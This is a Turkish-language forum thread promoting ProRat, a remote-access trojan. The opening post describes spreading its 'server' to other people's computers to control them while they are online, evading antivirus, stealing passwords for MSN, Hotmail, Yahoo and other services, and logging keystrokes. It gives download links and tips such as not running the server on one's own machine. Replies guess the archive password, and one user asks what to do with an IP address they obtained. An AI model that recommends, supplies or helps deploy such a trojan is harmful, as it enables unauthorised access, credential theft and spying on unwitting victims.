PRORAT`LA SON NOKTA
-
Arkadaşlar prorat programının temelinde trojenleryatar programaın çalışma prensibi ufak server lar la bilgisayara yayılıp size mail göndermesidir bilgisayarları onlıne olduğu sürece herşekilde konturol edersiniz.Bilgisayarlar arasındaki bağlantıyı Ip Adress leri sayesinde kontrol ediyorsunuz.3 çeşit server var acemiler için ilk serverı öneririm çok basit ve anlaşılması zor bir program.Bir çok virüs programını kilitleyip rahatça çalışa biliyor.prorat dosyasını www.prorat.net/dowlound/prorat.zip sitesinden indirebilirsiniz.Detaylı anlatım prorat dosyasının içinde tr açıklama var.
NOT:OLUŞTURDUĞUNUZ SERVER`I KENDİ BİLGİSAYARINIZDA ÇALIŞTIRMAYINIZ.
PRORATIN KIRDIĞI ŞİFRELER:
1-MSN
2-ICQ
3-MYNET
4-HOTMAİL
5-YAHOO
6-BİLGİSAYARDA BULUNAN ÖZEL ŞİFRELERİNİZ
7-PROGRAMDA KEYLOGER YAMASI VAR BÜTÜN KILAVYEDEN YAZILANLAR EKRANDA GÖZÜKÜR
-
LİNK
-
-
oraya ben ling vermedim ki sadece www.prorat.net sitesindeki programa ulaşım sıralamasını yazdım düşünceden düşünceye fark var ling vercek olsam kendi sitemin adresini verirdim . ama doğrusu
böyle olur:http: www.prorat.net/downloads.php
freetekno yazılım geliştirme severı
-
Yine de öz eleştiriniz ve dikkatinizi çektiği iin sevindim tşk
-
proratın kendısı trojandır hack yapayımd erken hacklenıyorsunuz her bılgısayarda calısmıyor sureklı sorun cıkaran dandık bır program o kdar lamerlık yanı
-
yav arkadaşlar ben bugün dalgınımda bu dosyayı yükledim bende şifreli zip dosyası acaba sizdedemi öle.. şifresini bilen varmı.. ben açamadım
-
of off hakkatten dalgınım yav ok ok hallettim... (ulen nasıl bilmem yav)
-
ZİP Lİ DOSYANIN ŞİFRE BÜYÜK BİR İHTİMALLE "PRO" OLMASI LAZIM
-
-
yav ne yapsakki mesela ıp numarasını aldım.. bi öneri verin ne olur bu numarayla